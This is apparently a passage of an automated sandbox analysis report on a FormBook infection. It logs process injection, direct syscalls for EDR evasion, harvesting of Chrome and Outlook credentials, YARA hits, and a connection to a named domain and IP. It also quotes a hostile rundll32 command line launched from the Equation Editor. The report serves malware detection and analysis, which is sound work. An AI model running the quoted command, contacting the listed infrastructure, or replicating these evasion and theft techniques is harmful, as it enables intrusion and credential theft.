              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008D0101 rdtsc 9_2_008D0101
              Source: C:\Windows\SysWOW64\convert.exeWindow / User API: threadDelayed 9827Jump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xwizardJump to dropped file
              Source: C:\Windows\SysWOW64\convert.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
              Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wcC8DC.tmpJump to dropped file
              Source: C:\Windows\SysWOW64\convert.exeAPI coverage: 2.5 %
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3444Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\convert.exe TID: 3712Thread sleep count: 131 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exe TID: 3712Thread sleep time: -262000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\convert.exe TID: 3840Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\convert.exe TID: 3712Thread sleep count: 9827 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exe TID: 3712Thread sleep time: -19654000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\convert.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\convert.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E18C7E sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,11_2_61E18C7E
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008D0101 rdtsc 9_2_008D0101
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008807AC NtCreateMutant,LdrInitializeThunk,9_2_008807AC
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00870080 mov ecx, dword ptr fs:[00000030h]9_2_00870080
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008700EA mov eax, dword ptr fs:[00000030h]9_2_008700EA
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008926F8 mov eax, dword ptr fs:[00000030h]9_2_008926F8

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\rundll32.exeDomain query: www.diced.jp
              Source: C:\Windows\System32\rundll32.exeNetwork Connect: 153.121.40.91 443Jump to behavior
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
              Source: C:\Windows\System32\rundll32.exeNtRequestWaitReplyPort: Direct from: 0x1F7741Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtClose: Direct from: 0x774CFA02
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
              Source: C:\Windows\System32\rundll32.exeNtSetInformationThread: Direct from: 0xFFF2302BJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
              Source: C:\Windows\System32\rundll32.exeNtDeviceIoControlFile: Direct from: 0x772FA561Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
              Source: C:\Windows\System32\rundll32.exeNtWriteFile: Direct from: 0x1F18A0Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
              Source: C:\Windows\System32\rundll32.exeNtClose: Direct from: 0x1DD6F4
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
              Source: C:\Windows\System32\rundll32.exeNtAllocateVirtualMemory: Direct from: 0x1C69EFJump to behavior
              Source: C:\Windows\System32\rundll32.exeNtCreateFile: Direct from: 0x1F15EFJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtSetInformationThread: Direct from: 0x774CFF12Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
              Source: C:\Windows\System32\rundll32.exeNtMapViewOfSection: Direct from: 0x1F6383Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
              Source: C:\Windows\System32\rundll32.exeNtUnmapViewOfSection: Direct from: 0x1DD656Jump to behavior
              Source: C:\Windows\System32\rundll32.exeNtUnmapViewOfSection: Direct from: 0xFFF22F5BJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Windows\System32\rundll32.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe protection: readonlyJump to behavior
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: NULL target: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: NULL target: C:\Windows\SysWOW64\convert.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: NULL target: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: NULL target: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\convert.exeThread APC queued: target process: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C rundll32 %tmp%\xwizard.,IEX A CJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A CJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A CJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeProcess created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: mVjlVtpvDsvJ.exe, 0000000A.00000002.648495302.0000000001290000.00000002.00000001.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000A.00000000.478874485.0000000001290000.00000002.00000001.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000000.510305712.0000000001290000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
              Source: mVjlVtpvDsvJ.exe, 0000000A.00000002.648495302.0000000001290000.00000002.00000001.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000A.00000000.478874485.0000000001290000.00000002.00000001.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000000.510305712.0000000001290000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: mVjlVtpvDsvJ.exe, 0000000A.00000002.648495302.0000000001290000.00000002.00000001.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000A.00000000.478874485.0000000001290000.00000002.00000001.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000000.510305712.0000000001290000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
              Source: C:\Windows\SysWOW64\convert.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1xhx8.zip VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1xhx8.zip VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1xhx8.zip VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1xhx8.zip VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1xhx8.zip VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1xhx8.zip VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1xhx8.zip VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1xhx8.zip VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E90550 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,11_2_61E90550
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 9.2.ImagingDevices.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.648541156.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497403170.00000000001E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648550804.0000000000840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.648430732.00000000008F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.553330249.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648308986.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497567649.0000000002200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 9.2.ImagingDevices.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.648541156.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497403170.00000000001E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY
